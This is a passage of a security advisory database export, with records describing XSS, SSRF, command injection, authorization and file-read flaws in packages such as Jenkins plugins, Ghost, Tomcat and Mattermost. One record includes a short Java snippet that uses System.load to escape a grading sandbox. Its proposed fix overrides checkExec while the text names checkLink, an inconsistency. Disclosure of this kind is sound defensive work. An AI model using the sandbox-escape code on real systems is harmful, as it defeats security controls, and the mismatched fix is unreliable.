['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T21:33:24Z', 'nvd_published_at': '2023-02-07T19:15:00Z'}" 1.4.0,GHSA-98hq-4wmw-98w9,2023-02-10T23:52:13Z,2023-02-10T23:52:13Z,,[],Arbitrary code execution in de.tum.in.ase:artemis-java-test-sandbox,"### Summary Because of the missing `checkLink(String)` override in the SecurityManager, students can load libraries and execute arbitrary code. ### Details Using `System.load(String)` or `System.loadLibrary​(String)` students can load and execute arbitrary code. ```java private static native void start(List args); public static void main(String[] args) { System.load(new File(""path_to_lib.so"").getAbsolutePath()); start(List.of(args)); } ``` Adding this to the security manager (and a translation) should fix the issue: ```java @Override public void checkExec(String cmd) { try { if (enterPublicInterface()) return; throw new SecurityException(localized(""security.error_link"")); //$NON-NLS-1$ } finally { exitPublicInterface(); } } ``` ### PoC See details. ### Impact Arbitrary code execution. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'de.tum.in.ase:artemis-java-test-sandbox'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ls1intum/Ares/security/advisories/GHSA-98hq-4wmw-98w9'}, {'type': 'PACKAGE', 'url': 'https://github.com/ls1intum/Ares'}]","{'cwe_ids': ['CWE-284'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-10T23:52:13Z', 'nvd_published_at': None}" 1.4.0,GHSA-ph74-8rgx-64c5,2023-02-23T21:31:42Z,2023-02-15T15:30:41Z,,['CVE-2023-25761'],Cross-site Scripting in Jenkins JUnit Plugin,"Jenkins JUnit Plugin 1166.va_436e268e972 and earlier does not escape test case class names in JavaScript expressions, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control test case class names in the JUnit resources processed by the plugin.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:junit'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1166.va'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25761'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-02-15/#SECURITY-3032'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/02/15/4'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-15T18:24:22Z', 'nvd_published_at': '2023-02-15T14:15:00Z'}" 1.4.0,GHSA-mrqx-mjc4-vfh3,2023-02-02T19:27:16Z,2023-02-02T19:26:47Z,,['CVE-2023-0610'],wallabag subject to Improper Authorization via annotations,"### Impact The annotations feature lets users add annotations on highlighted parts of an entry. The controller does not validate authorization on `PUT` and `DELETE` requests which lets a logged user modify or delete any annotation using their ID on their endpoints `example.org/annotations/{id}`. These vulnerable requests also disclose highlighted parts of the entry to the attacker. You should immediately patch your instance to version 2.5.3 or higher if you have more than one user and/or having open registration. ### Resolution A user check is now done in the vulnerable methods before applying change on an annotation. The Annotation retrieval through a `ParamConverter` has also been replaced with a call to the `AnnotationRepository` in order to prevent any information disclosure through response discrepancy. ### Workarounds ### Credits We would like to thank @bAuh0lz for reporting this issue through huntr.dev. Reference: https://huntr.dev/bounties/8fdd9b31-d89b-4bbe-9557-20b960faf926/ ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'wallabag/wallabag'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0-beta.1'}, {'fixed': '2.5.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/wallabag/wallabag/security/advisories/GHSA-mrqx-mjc4-vfh3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0610'}, {'type': 'WEB', 'url': 'https://github.com/wallabag/wallabag/commit/5ac6b6bff9e2e3a87fd88c2904ff3c6aac40722e'}, {'type': 'PACKAGE', 'url': 'https://github.com/wallabag/wallabag'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/8fdd9b31-d89b-4bbe-9557-20b960faf926'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-02T19:26:47Z', 'nvd_published_at': None}" 1.4.0,GHSA-p4g4-wgrh-qrg2,2023-06-13T23:48:33Z,2023-02-07T22:59:30Z,,['CVE-2020-15106'],Panic due to malformed WALs in go.etcd.io/etcd,"### Vulnerability type Data Validation ### Detail The size of a record is stored in the length field of a WAL file and no additional validation is done on this data. Therefore, it is possible to forge an extremely large frame size that can unintentionally panic at the expense of any RAFT participant trying to decode the WAL. ### References Find out more on this vulnerability in the [security audit report](https://github.com/etcd-io/etcd/blob/master/security/SECURITY_AUDIT.pdf) ### For more information If you have any questions or comments about this advisory: * Contact the [etcd security committee](https://github.com/etcd-io/etcd/blob/master/security/security-release-process.md#product-security-committee-psc)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/etcd-io/etcd/wal'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.10'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'go.etcd.io/etcd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.0-alpha.5.0.20200423152442-f4b650b51dc4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/etcd-io/etcd/security/advisories/GHSA-p4g4-wgrh-qrg2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15106'}, {'type': 'WEB', 'url': 'https://github.com/etcd-io/etcd/pull/11793'}, {'type': 'WEB', 'url': 'https://github.com/etcd-io/etcd/commit/4571e528f49625d3de3170f219a45c3b3d38c675'}, {'type': 'WEB', 'url': 'https://github.com/etcd-io/etcd/commit/f4b650b51dc4a53a8700700dc12e1242ac56ba07'}, {'type': 'PACKAGE', 'url': 'https://github.com/etcd-io/etcd'}, {'type': 'WEB', 'url': 'https://github.com/etcd-io/etcd/blob/master/security/SECURITY_AUDIT.pdf'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L6B6R43Y7M3DCHWK3L3UVGE2K6WWECMP/'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2020-0005'}]","{'cwe_ids': ['CWE-20'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-02-07T22:59:30Z', 'nvd_published_at': '2020-08-05T19:15:00Z'}" 1.4.0,GHSA-47p5-p3jw-w78w,2023-03-03T00:02:15Z,2023-02-17T18:30:23Z,,['CVE-2021-33926'],Server-Side Request Forgery in Plone CMS,An issue in Plone CMS allows attacker to access sensitive information via the RSS feed protlet.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Plone'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.3'}, {'fixed': '5.2.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33926'}, {'type': 'PACKAGE', 'url': 'https://github.com/plone/Plone'}, {'type': 'WEB', 'url': 'https://github.com/s-kustm/Subodh/blob/master/Plone%205.2.4%20Vulnerable%20to%20bilend%20SSRF.pdf'}, {'type': 'WEB', 'url': 'https://plone.org/security/hotfix/20210518'}, {'type': 'WEB', 'url': 'https://plone.org/security/hotfix/20210518/blind-ssrf-via-feedparser-accessing-an-internal-url'}]","{'cwe_ids': ['CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-17T20:50:53Z', 'nvd_published_at': '2023-02-17T18:15:00Z'}" 1.4.0,GHSA-r2h5-3hgw-8j34,2023-02-17T20:51:24Z,2023-02-17T20:51:24Z,,[],User data in TPM attestation vulnerable to MITM,"### Impact Attestation *user data* (such as the digest of the public key in an aTLS connection) was bound to the issuer's TPM, but not to its PCR state. An attacker could intercept a node initialization, initialize the node themselves, and then impersonate an uninitialized node to the validator. In practice, this meant that a CSP insider with sufficient privileges would have been able to join a node under their control to a Constellation cluster. ### Patches The issue has been patched in [v2.5.2](https://github.com/edgelesssys/constellation/releases/tag/v2.5.2). ### Workarounds none",[],"[{'package': {'ecosystem': 'Go', 'name': 'github.com/edgelesssys/constellation/v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.5.1'}}]","[{'type': 'WEB', 'url': 'https://github.com/edgelesssys/constellation/security/advisories/GHSA-r2h5-3hgw-8j34'}, {'type': 'PACKAGE', 'url': 'https://github.com/edgelesssys/constellation'}, {'type': 'WEB', 'url': 'https://github.com/edgelesssys/constellation/releases/tag/v2.5.2'}]","{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-17T20:51:24Z', 'nvd_published_at': None}" 1.4.0,GHSA-9fh3-j99m-f4v7,2023-03-03T23:31:11Z,2023-02-24T00:30:17Z,,['CVE-2022-36231'],Code injection in pdf_info,pdf_info 0.5.3 is vulnerable to Command Execution. An attacker using a specially crafted payload may execute OS commands by using command chaining because during object initalization there is no validation performed and the user provided path is used.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'pdf_info'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.5.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-36231'}, {'type': 'WEB', 'url': 'https://github.com/newspaperclub/pdf_info/issues/16'}, {'type': 'WEB', 'url': 'https://github.com/newspaperclub/pdf_info/pull/15'}, {'type': 'WEB', 'url': 'https://github.com/affix/CVE-2022-36231'}, {'type': 'PACKAGE', 'url': 'https://github.com/newspaperclub/pdf_info'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/pdf_info/CVE-2022-36231.yml'}, {'type': 'WEB', 'url': 'https://rubygems.org/gems/pdf_info'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-24T00:33:27Z', 'nvd_published_at': '2023-02-23T22:15:00Z'}" 1.4.0,GHSA-vjxx-jgcx-9fq2,2023-03-01T01:48:56Z,2023-02-18T03:30:17Z,,['CVE-2023-0901'],Pixelfed allows user enumeration via reset password functionality,Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository pixelfed/pixelfed 0.11.4 and prior.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pixelfed/pixelfed'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.11.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0901'}, {'type': 'WEB', 'url': 'https://github.com/pixelfed/pixelfed/commit/5b5f5bc38ca9ba39d0b7dacc3813fb899f71ba57'}, {'type': 'PACKAGE', 'url': 'https://github.com/pixelfed/pixelfed'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/0327b1b2-6e7c-4154-a307-15f236571010'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T00:04:32Z', 'nvd_published_at': '2023-02-18T01:15:00Z'}" 1.4.0,GHSA-c2rc-8m9f-g4fh,2023-03-06T01:45:11Z,2023-02-28T03:30:18Z,,['CVE-2023-1081'],Microweber Cross-site Scripting vulnerability,Cross-site Scripting (XSS) - Stored in GitHub repository microweber/microweber 1.3.2 and prior. A patch is available and anticipated to be part of version 1.3.3.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'microweber/microweber'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.3.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1081'}, {'type': 'WEB', 'url': 'https://github.com/microweber/microweber/commit/29d418461d8407688f2720e7b4be915e03fc16c1'}, {'type': 'PACKAGE', 'url': 'https://github.com/microweber/microweber'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/cf59deed-9d43-4552-acfd-43f38f3aabba'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-28T23:31:01Z', 'nvd_published_at': '2023-02-28T02:15:00Z'}" 1.4.0,GHSA-crh5-vv2v-c82q,2023-02-22T00:09:19Z,2023-02-21T00:30:20Z,,['CVE-2021-32850'],@claviska/jquery-minicolors vulnerable to Cross-site Scripting,"jQuery MiniColors is a color picker built on jQuery. Prior to version 2.3.6, jQuery MiniColors is prone to cross-site scripting when handling untrusted color names. This issue is patched in version 2.3.6.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@claviska/jquery-minicolors'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32850'}, {'type': 'WEB', 'url': 'https://github.com/claviska/jquery-minicolors/commit/ef134824a7f4110ada53ea6c173111a4fa2f48f3'}, {'type': 'WEB', 'url': 'https://codepen.io/webbiesdk/pen/oNBQNNV'}, {'type': 'PACKAGE', 'url': 'https://github.com/claviska/jquery-minicolors'}, {'type': 'WEB', 'url': 'https://github.com/claviska/jquery-minicolors/releases/tag/2.3.6'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MC5HV4ESLV2E23YGHNJ542QEZBH6YE2F/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDXBWA54A7D6HMR2TN5BAYNCU7HO2PUO/'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2021-1045_jQuery_MiniColors_Plugin/'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.215306'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.215306'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T00:09:19Z', 'nvd_published_at': '2023-02-20T22:15:00Z'}" 1.4.0,GHSA-g3vf-47fv-8f3c,2023-08-16T21:39:51Z,2023-08-11T15:30:46Z,,['CVE-2021-26505'],MrSwitch hello.js vulnerable to prototype pollution,A prototype pollution vulnerability in MrSwitch hello.js prior to version 1.18.8 allows remote attackers to execute arbitrary code via `hello.utils.extend` function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'hellojs'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.18.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26505'}, {'type': 'WEB', 'url': 'https://github.com/MrSwitch/hello.js/issues/634'}, {'type': 'WEB', 'url': 'https://github.com/MrSwitch/hello.js/commit/7ab50aeff2d41991f08d4ad6c0481125eea8f6b7'}, {'type': 'PACKAGE', 'url': 'https://github.com/MrSwitch/hello.js'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-11T22:08:41Z', 'nvd_published_at': None}" 1.4.0,GHSA-mq4v-6vg4-796c,2023-08-21T19:33:04Z,2023-08-11T09:30:36Z,,['CVE-2023-39553'],apache-airflow-providers-apache-drill Improper Input Validation vulnerability,"Improper Input Validation vulnerability in Apache Software Foundation Apache Airflow Drill Provider. Apache Airflow Drill Provider is affected by a vulnerability that allows an attacker to pass in malicious parameters when establishing a connection with DrillHook giving an opportunity to read files on the Airflow server. This issue affects Apache Airflow Drill Provider before 2.4.3. It is recommended to upgrade to a version that is not affected. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow-providers-apache-drill'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39553'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/pull/33074'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/commit/394a727ac2c18d58978bf186a7a92923460ec110'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2023-136.yaml'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/ozpl0opmob49rkcz8svo8wkxyw1395sf'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/11/1'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-11T22:01:37Z', 'nvd_published_at': None}" 1.4.0,GHSA-6xjj-v76v-fwpj,2023-08-11T21:56:52Z,2023-08-11T09:30:36Z,,['CVE-2023-4107'],Mattermost does not validate requesting user permissions before updating admin details,"Mattermost fails to properly validate the requesting user permissions when updating a system admin, allowing a user manager to update a system admin's details such as email, first name and last name. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v6'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.8.8'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.8.7'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v6'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.9.0'}, {'fixed': '7.9.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.9.5'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v6'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.10.0'}, {'fixed': '7.10.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.10.3'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4107'}, {'type': 'PACKAGE', 'url': 'https://github.com/mattermost/mattermost'}, {'type': 'WEB', 'url': 'https://mattermost.com/security-updates'}]","{'cwe_ids': ['CWE-284', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-11T21:56:52Z', 'nvd_published_at': None}" 1.4.0,GHSA-gq5f-xv48-2365,2023-08-30T12:59:50Z,2023-08-22T21:30:26Z,,['CVE-2022-44729'],Apache XML Graphics Batik Server-Side Request Forgery vulnerability,"Server-Side Request Forgery (SSRF) vulnerability in Apache Software Foundation Apache XML Graphics Batik.This issue affects Apache XML Graphics Batik: 1.16. On version 1.16, a malicious SVG could trigger loading external resources by default, causing resource consumption or in some cases even information disclosure. Users are recommended to upgrade to version 1.17 or later. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.xmlgraphics:batik-bridge'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0'}, {'fixed': '1.17'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.xmlgraphics:batik-svgrasterizer'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0'}, {'fixed': '1.17'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.xmlgraphics:batik-transcoder'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0'}, {'fixed': '1.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-44729'}, {'type': 'WEB', 'url': 'https://github.com/apache/xmlgraphics-batik/commit/85b3457d9902f64d5d409a8da060d5ba47d0b69b'}, {'type': 'WEB', 'url': 'https://github.com/apache/xmlgraphics-batik/commit/aaa1dd3e6b5a7df781d73e0c37a1df6a8f318893'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/xmlgraphics-batik'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/BATIK-1349'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/hco2nw1typoorz33qzs0fcdx0ws6d6j2'}, {'type': 'WEB', 'url': 'https://xmlgraphics.apache.org/security.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/22/2'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/22/4'}]","{'cwe_ids': ['CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-23T17:53:44Z', 'nvd_published_at': None}" 1.4.0,GHSA-jg35-vf67-gg2j,2023-08-16T21:05:51Z,2023-08-16T15:30:18Z,,['CVE-2023-40346'],Jenkins Shortcut Job Plugin stored cross-site scripting vulnerability,"Jenkins Shortcut Job Plugin 0.4 and earlier does not escape the shortcut redirection URL. This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure shortcut jobs. Shortcut Job Plugin 0.5 escapes the shortcut redirection URL.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.jenkins.plugins:shortcut-job'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40346'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-08-16/#SECURITY-3071'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/16/3'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-16T21:05:51Z', 'nvd_published_at': None}" 1.4.0,GHSA-9c9v-w225-v5rg,2023-08-23T17:19:50Z,2023-08-15T20:35:20Z,,['CVE-2023-40028'],Ghost vulnerable to arbitrary file read via symlinks in content import,"### Impact A vulnerability in Ghost allows authenticated users to upload files which are symlinks. This can be exploited to perform an arbitrary file read of any file on the operating system. Site administrators can check for exploitation of this issue by looking for unknown symlinks within Ghost's `content/` folder ### Vulnerable versions This security vulnerability is present in Ghost ≤ v5.59.0. ### Patches v5.59.1 contains a fix for this issue. ### For more information If you have any questions or comments about this advisory: * Email us at [security@ghost.org](mailto:security@ghost.org) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'ghost'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.59.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TryGhost/Ghost/security/advisories/GHSA-9c9v-w225-v5rg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40028'}, {'type': 'WEB', 'url': 'https://github.com/TryGhost/Ghost/commit/690fbf3f7302ff3f77159c0795928bdd20f41205'}, {'type': 'PACKAGE', 'url': 'https://github.com/TryGhost/Ghost'}]","{'cwe_ids': ['CWE-22', 'CWE-59'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-15T20:35:20Z', 'nvd_published_at': None}" 1.4.0,GHSA-q3mw-pvr8-9ggc,2023-08-31T18:50:44Z,2023-08-25T21:30:48Z,,['CVE-2023-41080'],Apache Tomcat Open Redirect vulnerability,"URL Redirection to Untrusted Site ('Open Redirect') vulnerability in FORM authentication feature Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.0.12, from 9.0.0-M1 through 9.0.79 and from 8.5.0 through 8.5.92. The vulnerability is limited to the ROOT (default) web application.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0-M1'}, {'fixed': '11.0.0-M11'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.1.0-M1'}, {'fixed': '10.1.13'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0-M1'}, {'fixed': '9.0.80'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.5.0'}, {'fixed': '8.5.93'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.5.0'}, {'fixed': '8.5.93'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0-M1'}, {'fixed': '9.0.80'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.1.0-M1'}, {'fixed': '10.1.13'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0-M1'}, {'fixed': '11.0.0-M11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-41080'}, {'type': 'WEB', 'url': 'https://github.com/apache/tomcat/commit/4998ad745b67edeadefe541c94ed029b53933d3b'}, {'type': 'WEB', 'url': 'https://github.com/apache/tomcat/commit/77c0ce2d169efa248b64b992e547aad549ec906b'}, {'type': 'WEB', 'url': 'https://github.com/apache/tomcat/commit/bb4624a9f3e69d495182ebfa68d7983076407a27'}, {'type': 'WEB', 'url': 'https://github.com/apache/tomcat/commit/e3703c9abb8fe0d5602f6ba8a8f11d4b6940815a'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/tomcat'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/71wvwprtx2j2m54fovq9zr7gbm2wow2f'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230921-0006/'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-25T22:05:01Z', 'nvd_published_at': None}" 1.4.0,GHSA-w5gq-xrrp-3fxf,2023-08-21T19:33:09Z,2023-08-14T18:32:59Z,,['CVE-2023-0872'],OpenNMS privilege elevation vulnerability,"The Horizon REST API includes a users endpoint in OpenNMS Horizon 31.0.8 and versions earlier than 32.0.2 on multiple platforms is vulnerable to elevation of privilege. The solution is to 